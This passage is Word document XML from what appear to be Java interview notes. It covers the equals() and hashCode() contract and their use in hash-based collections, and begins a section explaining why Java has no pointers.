          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and hash</w:t>
      </w:r>
      <w:r w:rsidR="004A5252" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ode</w:t>
      </w:r>
      <w:r w:rsidR="004A5252" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="29EDB118" w14:textId="0DA4AC95" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>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2"/>
        <w:gridCol w:w="3580"/>
        <w:gridCol w:w="4712"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="715A83F9" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EAFAEC7" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D320BF">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54D0BF97" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D320BF">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quals()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6752DFA4" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D320BF">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ashCode()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="09872068" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3885C8CA" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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rpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F74C56C" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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ares contents of two objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DC6AA7C" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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s an integer hash code for the object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="700577D7" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FF2E297" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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fined in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43EB8629" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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lang.Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D869B6D" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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lang.Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="65F26398" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CD36BBE" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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 type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75D91C94" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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oolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="252A61B0" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="2C99F9B4" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EE3A313" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF3D61D" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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to check logical equality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E69D194" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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in hash-based collections like HashMap, HashSet, Hashtable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w14:paraId="27089356" w14:textId="77777777" w:rsidTr="00EB39CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A0D2730" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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ust override together?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55A52A23" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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Yes – if you override one, override the other</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C4E686B" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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Yes – to maintain contract</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F090224" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D92E7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C0B9326">
          <v:rect id="_x0000_i1122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A3E5E2" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001CC495" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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AAE2ABE" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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36AAB815" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64C58F" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFBE72E" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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verride equals()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE07638" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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4A24507C" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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equals</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Objec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E306E8D" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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thi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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530DF854" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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obj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getClas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Clas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59FC97F0" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Pers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p>
    <w:p w14:paraId="4A5DC1D5" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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ag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age </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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qual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ame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1D496" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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7A5278E" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB3ABE" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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verride hashCode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3961CA" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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00696943" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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hashCod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6F7F1E0" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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Objec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has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Java 7+ utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107039B" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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98DD19B" w14:textId="29A0B70C" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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20CB8215" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D92E7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1909A5">
          <v:rect id="_x0000_i1123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A26BD" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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Contract between equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411C7F66" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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wo objects are equal (equals() returns true), then their hashCode() must be the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C6D1D" w14:textId="77777777" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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hashCode() is different, equals() must return false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE7C841" w14:textId="134E41BB" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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hashCode() is the same, equals() may still return false (hash collision).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FA2F91" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D92E7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93EE0F">
          <v:rect id="_x0000_i1124" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F48C4D" w14:textId="77777777" w:rsidR="00DB20FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB20FD" w:rsidP="00D92E78">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FFB23B" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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lastRenderedPageBreak/>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Used in Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AB133" w14:textId="26C7ED42" w:rsidR="00C40AF1" w:rsidRPr="00CE4B95"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6159790"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Pers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p>
    <w:p w14:paraId="0CCA7B3C" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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hCode() is used to locate the bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE659FA" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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quals() is used to find the correct key in the bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7616B9F6" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D92E7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0209D9A">
          <v:rect id="_x0000_i1125" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E91304" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If You Only Override equals() but Not hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B7C02" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB39CC" w:rsidP="00D92E7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h-based collections won’t work properly – e.g., duplicate keys may be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2146B9" w14:textId="77777777" w:rsidR="00EB39CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EB39C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E4AE2DA">
          <v:rect id="_x0000_i1126" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1F4F1" w14:textId="3C194F70" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00467575">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc196307509"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Does Java support Pointers</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="68E5F309" w14:textId="28900D44" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="00740599">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Java does not support pointers like C or C++ does.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7BC8D" w14:textId="547305A4" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="009F689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y?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9566D" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="003D3622">
      <w:pPr>
        <w:ind w:firstLine="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 was designed with the goal of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3948413B" w14:textId="77777777" w:rsidR="003D3622" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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afety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4E5E0" w14:textId="77777777" w:rsidR="003D3622" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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mplicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC587B" w14:textId="00701A12" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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latform-independence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B3968" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="003D3622">
      <w:pPr>
        <w:ind w:firstLine="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lowing raw memory access through pointers (like in C/C++) can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20640790" w14:textId="77777777" w:rsidR="003D3622" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ead to security vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4DB797" w14:textId="77777777" w:rsidR="003D3622" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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use memory corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE6AF5" w14:textId="487A63A6" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ke garbage collection impossible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7389FA0A" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F68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6B6D302">
          <v:rect id="_x0000_i1127" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A44F3"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What Java does instea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8"/>
        <w:gridCol w:w="4893"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="64F28BCB" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F43E6BC"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eature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AF78693"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s Alternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="2F360E7C" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47E9D525"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ointers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70A2C395"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ferences (object handles, no direct memory access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="2DEDB1FA" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
